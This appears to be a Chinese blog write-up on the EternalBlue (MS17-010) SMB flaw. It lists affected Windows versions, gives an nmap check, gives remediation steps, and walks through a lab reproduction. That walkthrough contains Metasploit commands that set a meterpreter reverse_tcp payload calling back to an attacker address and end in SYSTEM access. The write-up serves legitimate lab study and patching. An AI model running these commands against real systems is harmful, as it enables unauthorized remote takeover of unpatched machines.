漏洞简介

EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。

漏洞影响范围

Windows Server 2000 SP0 x86
Windows 2000 Professional SP4 x86
Windows 2000 Advanced Server SP4 x86
Windows XP SP0 x86
Windows XP SP1 x86
Windows XP SP2 x86
Windows XP SP3 x86
Windows XP SP2 x64
Windows Server 2003 x86
Windows Server 2003 Enterprise SP 2 x86
Windows Server 2003 x64
Windows Vista Home Premium x86
Windows Server 2008 x64
Windows 7 x86
Windows 7 x64
Windows Server 2008 R2 x64
Windows 8 x86
Windows 8 x64
Windows 8.1 x86
Windows 8.1 x64
Windows Server 2012 R2 Standard 9600 x64
Windows Server 2016 10.10586 x64
Windows Server 2016 Data Center 10.14393 x64

漏洞检测

使用nmap命令:nmap -p445 --script smb-vuln-ms17-010 目标IP

复现

攻击机 kali 192.168.23.140
靶机 win7 192.168.23.137

使用msf

msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.23.137
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.23.140
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
最后获得system权限

漏洞处理

1.下载安全补丁
2、添加入站规则,关闭445、135、137、138、139端口

最后修改:2021 年 06 月 04 日 09 : 36 AM
如果觉得我的文章对你有用,请随意赞赏